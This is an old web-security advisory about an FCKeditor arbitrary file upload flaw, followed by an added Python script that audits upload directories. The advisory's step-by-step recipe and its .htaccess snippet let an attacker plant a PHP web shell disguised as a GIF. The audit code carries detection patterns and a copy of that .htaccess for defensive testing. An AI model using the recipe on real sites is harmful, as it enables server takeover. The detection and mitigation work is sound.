FCKeditor Upload Vulnerability, All PHP Versions
Author: Anonymous  Source: compiled by this site  Published: 2011-10-25 7:39:07
[+] Title: FCKeditor All Versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create a .htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
2. Now upload this .htaccess with FCKeditor.
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
———————————————————————————————
3. Now upload shell.php.gif with FCKeditor.
4. After the upload, the name "shell.php.gif" is changed to "shell_php.gif" automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. The shell is now available on the server.
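The technique above depends on two artefacts landing in the upload directory: a user-supplied .htaccess that maps a harmless-looking extension to the PHP handler, and an uploaded file whose renamed name (shell_php.gif) still carries a PHP extension. The following audit script is an added example for defenders and is not part of the advisory or of FCKeditor; it walks an upload tree, flags any .htaccess containing handler-changing directives, and flags filenames with a hidden server-side extension. The directory layout and sample files it builds are constructed here for demonstration.

```python
"""Audit an upload directory for the artefacts the FCKeditor .htaccess
upload technique leaves behind. Added defender example; the sample tree
built by build_sample_tree() is constructed, not taken from a real site.
"""
import os
import re
import shutil
import tempfile

# Apache directives that change how a file is served or executed. Any of
# these inside a .htaccess under an upload tree is a red flag.
HANDLER_DIRECTIVES = re.compile(
    r"^\s*(SetHandler|AddHandler|AddType|php_value|php_flag|"
    r"php_admin_value|php_admin_flag)\b",
    re.IGNORECASE | re.MULTILINE,
)

# A server-side extension hidden behind a final image/document extension,
# separated by "." or "_": shell.php.gif, shell_php.gif, x.phtml.png, ...
DOUBLE_EXT = re.compile(r"[._](php\d?|phtml|phar)[._][a-z0-9]+$", re.IGNORECASE)


def is_suspicious_name(name):
    """True if the file name carries a hidden PHP-family extension."""
    return bool(DOUBLE_EXT.search(name))


def htaccess_remaps_handler(body):
    """True if .htaccess text contains a handler- or PHP-setting directive."""
    return bool(HANDLER_DIRECTIVES.search(body))


def audit_upload_dir(root):
    """Walk `root` and return a sorted list of (path, reason) findings."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if name.startswith(".ht"):
                # Apache honours this file only when AllowOverride permits it,
                # but its presence in an upload tree is suspicious regardless.
                with open(path, encoding="utf-8", errors="replace") as fh:
                    body = fh.read()
                if htaccess_remaps_handler(body):
                    findings.append((path, "htaccess remaps handler"))
                else:
                    findings.append((path, "htaccess in upload dir"))
            elif is_suspicious_name(name):
                findings.append((path, "hidden php extension"))
    return sorted(findings)


def build_sample_tree():
    """Create a constructed upload tree in a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="upload_audit_")
    samples = {
        # mirrors the directive from the advisory
        ".htaccess": '<FilesMatch "_php.gif">\n'
                     "SetHandler application/x-httpd-php\n"
                     "</FilesMatch>\n",
        # renamed upload as FCKeditor would store it; body is a placeholder
        "shell_php.gif": "GIF89a (constructed placeholder body)",
        # benign files that must not be flagged
        "photo.gif": "GIF89a" + "\x00" * 16,
        "notes.txt": "benign text file",
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    try:
        for path, reason in audit_upload_dir(sample_root):
            print(f"{reason:28s} {path}")
    finally:
        shutil.rmtree(sample_root, ignore_errors=True)
```

Run it against a real upload directory by calling audit_upload_dir() with that path. The findings point at the two controls that close this hole on the server side: set AllowOverride None for the upload directory so an uploaded .htaccess is never read, and disable script execution there (for example with php_admin_flag engine off in the main Apache configuration), so a renamed shell_php.gif is served as bytes rather than run.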